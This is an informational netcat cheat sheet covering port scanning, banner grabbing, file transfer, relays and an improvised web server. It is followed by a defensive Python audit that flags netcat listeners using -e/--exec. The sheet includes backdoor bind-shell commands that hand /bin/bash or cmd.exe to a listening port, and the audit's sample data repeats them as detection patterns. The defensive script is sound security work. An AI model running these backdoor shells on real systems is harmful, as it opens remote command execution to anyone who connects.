---
tags:
  - netcat
categories:
  - informational
comments: true
date: 2021-09-05 00:00:00
---

port scanning

A basic port scan of an IP address or hostname with netcat (nc/ncat) looks like this:

nc -v -n 8.8.8.8 1-1000
nc -v google.com 1-1000

chat or web server

Start a listener on port 1299; anything typed on either end is sent to the other:

nc -l -p 1299

[Screenshot: the netcat chat command]

Then all you need to do is launch the chat session with a new TCP connection:

nc localhost 1299

basic web server

printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8999
w3m http://localhost:8999

HTTP requests with netcat

printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80

TCP server and TCP client

Run this Netcat command on the receiving host so it listens on port 1499 and writes whatever arrives to a file:

nc -l 1499 > filename.out

Run this command on the sending host to connect, transmit the file, and close the connection once the input is exhausted:

nc server.com 1499 < filename.in

launching reverse (backdoor) shell

nc -n -v -l -p 5555 -e /bin/bash

From any other system on the network, you can then connect and run commands on the host over the Netcat connection in bash:

nc -nv 127.0.0.1 5555

netcat fundamentals - command flags

nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose output

netcat relays on linux

mkfifo backpipe
nc -l -p [port] 0<backpipe | nc [client IP] [port] | tee backpipe

netcat banners

echo "" | nc -zv -w1 [host] [port range] – obtain the TCP banners for a range of ports (-w1 waits one second per port)

netcat backdoor shells

nc -l -p [port] -e /bin/bash – run a shell on Linux
nc -l -p [port] -e cmd.exe – run a shell on Netcat for Windows
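As an added example that is not part of the original post, here is the same flag knowledge applied from the defender's side: a small Python audit that parses constructed `ps -eo pid,user,args` output, recognises netcat invocations (nc, ncat, netcat and the Debian nc.traditional/nc.openbsd names), and rates listeners whose socket is handed to a program with -e/-c/--exec, the backdoor pattern the two shell sections above describe. The sample process list and the severity labels are this example's own assumptions.

```python
import os
import shlex
# Constructed sample of `ps -eo pid,user,args` output (not captured from a real host).
SAMPLE_PS = """\
  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
 2044 bob      nc -n -v -l -p 5555 -e /bin/bash
 2051 alice    ncat --listen 4444 --exec cmd.exe
 2060 carol    nc -v -n 8.8.8.8 1-1000
 2077 dave     /bin/nc.traditional -lvp 1499
"""
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}

def classify_netcat(argv):
    """None unless argv runs netcat; else whether it listens and what -e/-c/--exec runs."""
    if not argv or os.path.basename(argv[0]) not in NETCAT_NAMES:
        return None
    listening, exec_target = False, None
    args = argv[1:]
    for i, arg in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else "?"   # value that follows a flag
        if arg == "--listen":
            listening = True
        elif arg in ("--exec", "--sh-exec"):
            exec_target = nxt
        elif arg.startswith("-") and not arg.startswith("--"):
            letters = arg[1:]               # combined short flags such as -lvp
            listening = listening or "l" in letters
            if "e" in letters or "c" in letters:
                exec_target = nxt
    return {"listening": listening, "exec_target": exec_target}

def audit_netcat(ps_output):
    """Parse ps output (header line first) and rate every netcat process in it."""
    findings = []
    for line in ps_output.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        info = classify_netcat(shlex.split(cmd))
        if info is None:
            continue
        # high: socket handed to a program (the backdoor pattern above);
        # medium: ad hoc listener to verify; low: outbound client use (scan, transfer)
        severity = "high" if info["exec_target"] else "medium" if info["listening"] else "low"
        findings.append({"pid": int(pid), "user": user, "severity": severity, **info})
    return findings
```

Feed it real `ps -eo pid,user,args` output in place of the constructed sample; anything rated high deserves an immediate look at who started it and why.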

Credits

Jeff Petters. Jeff has been working on computers since his Dad brought home an IBM PC 8086 with dual disk drives. Researching and writing about data security is his dream job.

https://www.varonis.com/blog/author/jpetters/